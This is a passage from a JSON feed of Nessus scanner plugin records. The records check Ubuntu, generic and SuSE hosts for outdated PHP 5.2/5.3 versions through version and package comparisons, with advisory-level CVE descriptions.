pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xsl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php-pear\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cli\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-common\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-curl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-dbg\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-dev\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-enchant\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-gd\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-gmp\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-intl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-ldap\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-mysql\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-odbc\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-pgsql\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-pspell\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-recode\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-snmp\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-sqlite\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-sybase\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-tidy\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-xsl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php5filter / php-pear / php5 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:29:35", "description": "According to its banner, the version of PHP 5.2 installed on the remote host is older than 5.2.14. Such versions may be affected by several security issues :\n\n - An error exists when processing invalid XML-RPC requests that can lead to a NULL pointer dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'fnmatch' that can lead to stack exhaustion.\n\n - An error exists in the sqlite extension that could allow arbitrary memory access.\n\n - A memory corruption error exists in the function 'substr_replace'.\n\n - The following functions are not properly protected against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, iconv_mime_decode, iconv_substr, iconv_mime_encode, htmlentities, htmlspecialchars, str_getcsv, http_build_query, strpbrk, strstr, str_pad, str_word_count, wordwrap, strtok, setcookie, strip_tags, trim, ltrim, rtrim, parse_str, pack, unpack, uasort, preg_match, strrchr, strchr, substr, str_repeat (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW (CVE-2010-2191)\n\n - The default session serializer contains an error that can be exploited when assigning session variables having user defined names. Arbitrary serialized values can be injected into sessions by including the PS_UNDEF_MARKER, '!', character in variable names.\n\n - A use-after-free error exists in the function 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the function 'var_export' when handling certain error conditions. (CVE-2010-2531)", "cvss3": {}, "published": "2010-08-04T00:00:00", "type": "nessus", "title": "PHP 5.2 < 5.2.14 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1581", "CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3065"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_14.NASL", "href": "https://www.tenable.com/plugins/nessus/48244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48244);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2007-1581\",\n \"CVE-2010-0397\",\n \"CVE-2010-1860\",\n \"CVE-2010-1862\",\n \"CVE-2010-1864\",\n \"CVE-2010-2097\",\n \"CVE-2010-2100\",\n \"CVE-2010-2101\",\n \"CVE-2010-2190\",\n \"CVE-2010-2191\",\n \"CVE-2010-2225\",\n \"CVE-2010-2484\",\n \"CVE-2010-2531\",\n \"CVE-2010-3065\"\n );\n script_bugtraq_id(38708, 40948, 41991);\n script_xref(name:\"SECUNIA\", value:\"39675\");\n script_xref(name:\"SECUNIA\", value:\"40268\");\n\n script_name(english:\"PHP 5.2 < 5.2.14 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.2 installed on the\nremote host is older than 5.2.14. Such versions may be affected by\nseveral security issues :\n\n - An error exists when processing invalid XML-RPC \n requests that can lead to a NULL pointer\n dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'fnmatch' that can lead\n to stack exhaustion.\n\n - An error exists in the sqlite extension that could \n allow arbitrary memory access.\n\n - A memory corruption error exists in the function\n 'substr_replace'.\n\n - The following functions are not properly protected\n against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, \n iconv_mime_decode, iconv_substr, iconv_mime_encode,\n htmlentities, htmlspecialchars, str_getcsv,\n http_build_query, strpbrk, strstr, str_pad,\n str_word_count, wordwrap, strtok, setcookie, \n strip_tags, trim, ltrim, rtrim, parse_str, pack, unpack, \n uasort, preg_match, strrchr, strchr, substr, str_repeat\n (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\n CVE-2010-2097, CVE-2010-2100, CVE-2010-2101,\n CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected \n against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW\n (CVE-2010-2191)\n\n - The default session serializer contains an error\n that can be exploited when assigning session\n variables having user defined names. Arbitrary\n serialized values can be injected into sessions by\n including the PS_UNDEF_MARKER, '!', character in\n variable names.\n\n - A use-after-free error exists in the function\n 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the\n function 'var_export' when handling certain error \n conditions. (CVE-2010-2531)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_2_14.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.2.14\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.2.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.2\\.([0-9]|1[0-3])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.14\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:29:36", "description": "According to its banner, the version of PHP 5.3 installed on the remote host is older than 5.3.3. Such versions may be affected by several security issues :\n\n - An error exists when processing invalid XML-RPC requests that can lead to a NULL pointer dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'shm_put_var' that is related to resource destruction.\n\n - An error exists in the function 'fnmatch' that can lead to stack exhaustion. (CVE-2010-1917)\n\n - A memory corruption error exists related to call-time pass by reference and callbacks.\n\n - The dechunking filter is vulnerable to buffer overflow.\n\n - An error exists in the sqlite extension that could allow arbitrary memory access.\n\n - An error exists in the 'phar' extension related to string format validation.\n\n - The functions 'mysqlnd_list_fields' and 'mysqlnd_change_user' are vulnerable to buffer overflow.\n\n - The Mysqlnd extension is vulnerable to buffer overflow attack when handling error packets.\n\n - The following functions are not properly protected against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, iconv_mime_decode, iconv_substr, iconv_mime_encode, htmlentities, htmlspecialchars, str_getcsv, http_build_query, strpbrk, strtr, str_pad, str_word_count, wordwrap, strtok, setcookie, strip_tags, trim, ltrim, rtrim, substr_replace, parse_str, pack, unpack, uasort, preg_match, strrchr (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW, XOR (CVE-2010-2191)\n\n - The default session serializer contains an error that can be exploited when assigning session variables having user defined names. Arbitrary serialized values can be injected into sessions by including the PS_UNDEF_MARKER, '!', character in variable names.\n\n - A use-after-free error exists in the function 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the function 'var_export' when handling certain error conditions. (CVE-2010-2531)", "cvss3": {}, "published": "2010-08-04T00:00:00", "type": "nessus", "title": "PHP 5.3 < 5.3.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1581", "CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1917", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_3_3.NASL", "href": "https://www.tenable.com/plugins/nessus/48245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48245);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2007-1581\",\n \"CVE-2010-0397\",\n \"CVE-2010-1860\",\n \"CVE-2010-1862\",\n \"CVE-2010-1864\",\n \"CVE-2010-1917\",\n \"CVE-2010-2097\",\n \"CVE-2010-2100\",\n \"CVE-2010-2101\",\n \"CVE-2010-2190\",\n \"CVE-2010-2191\",\n \"CVE-2010-2225\",\n \"CVE-2010-2484\",\n \"CVE-2010-2531\",\n \"CVE-2010-3062\",\n \"CVE-2010-3063\",\n \"CVE-2010-3064\",\n \"CVE-2010-3065\"\n );\n script_bugtraq_id(\n 38708,\n 40461,\n 40948,\n 41991\n );\n script_xref(name:\"SECUNIA\", value:\"39675\");\n script_xref(name:\"SECUNIA\", value:\"40268\");\n\n script_name(english:\"PHP 5.3 < 5.3.3 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.3. Such versions may be affected by\nseveral security issues :\n\n - An error exists when processing invalid XML-RPC \n requests that can lead to a NULL pointer\n dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'shm_put_var' that\n is related to resource destruction.\n\n - An error exists in the function 'fnmatch' that can lead\n to stack exhaustion. (CVE-2010-1917)\n\n - A memory corruption error exists related to call-time\n pass by reference and callbacks.\n\n - The dechunking filter is vulnerable to buffer overflow.\n\n - An error exists in the sqlite extension that could \n allow arbitrary memory access.\n\n - An error exists in the 'phar' extension related to \n string format validation.\n\n - The functions 'mysqlnd_list_fields' and \n 'mysqlnd_change_user' are vulnerable to buffer overflow.\n\n - The Mysqlnd extension is vulnerable to buffer overflow\n attack when handling error packets.\n\n - The following functions are not properly protected\n against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, \n iconv_mime_decode, iconv_substr, iconv_mime_encode,\n htmlentities, htmlspecialchars, str_getcsv,\n http_build_query, strpbrk, strtr, str_pad,\n str_word_count, wordwrap, strtok, setcookie, \n strip_tags, trim, ltrim, rtrim, substr_replace,\n parse_str, pack, unpack, uasort, preg_match, strrchr\n (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\n CVE-2010-2097, CVE-2010-2100, CVE-2010-2101,\n CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected \n against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW, XOR\n (CVE-2010-2191)\n\n - The default session serializer contains an error\n that can be exploited when assigning session\n variables having user defined names. Arbitrary\n serialized values can be injected into sessions by\n including the PS_UNDEF_MARKER, '!', character in\n variable names.\n\n - A use-after-free error exists in the function\n 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the\n function 'var_export' when handling certain error \n conditions. (CVE-2010-2531)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_3_3.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.3.3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.3.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2007-1581\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.3\\.[0-2]($|[^0-9])\") \n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.3.3\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:33:12", "description": "PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065", "cvss3": {}, "published": "2010-10-11T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-MOD_PHP5-7110.NASL", "href": "https://www.tenable.com/plugins/nessus/49830", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49830);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.2.14 to fix serveral security issues :\n\n - CVE-2010-1860\n\n - CVE-2010-1862\n\n - CVE-2010-1864\n\n - CVE-2010-1914\n\n - CVE-2010-1915\n\n - CVE-2010-1917\n\n - CVE-2010-2093\n\n - CVE-2010-2094\n\n - CVE-2010-2097\n\n - CVE-2010-2100\n\n - CVE-2010-2101\n\n - CVE-2010-2190\n\n - CVE-2010-2191\n\n - CVE-2010-2225\n\n - CVE-2010-2484\n\n - CVE-2010-2531\n\n - CVE-2010-3062\n\n - CVE-2010-3063\n\n - CVE-2010-3064\n\n - CVE-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1860.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1862.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1864.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1914.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1915.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1917.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2093.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2094.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2097.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2100.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2101.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2190.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2191.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2225.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2484.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2531.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3065.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7110.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"apache2-mod_php5-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-bcmath-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-bz2-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-calendar-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-ctype-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-curl-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-dba-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-dbase-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-devel-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-dom-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-exif-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-fastcgi-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-ftp-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-gd-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-gettext-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-gmp-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-hash-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-iconv-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-imap-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-json-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-ldap-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-mbstring-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-mcrypt-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-mhash-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-mysql-5.2.14-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"php5-ncurses-5.2.14-0.4.1\")) 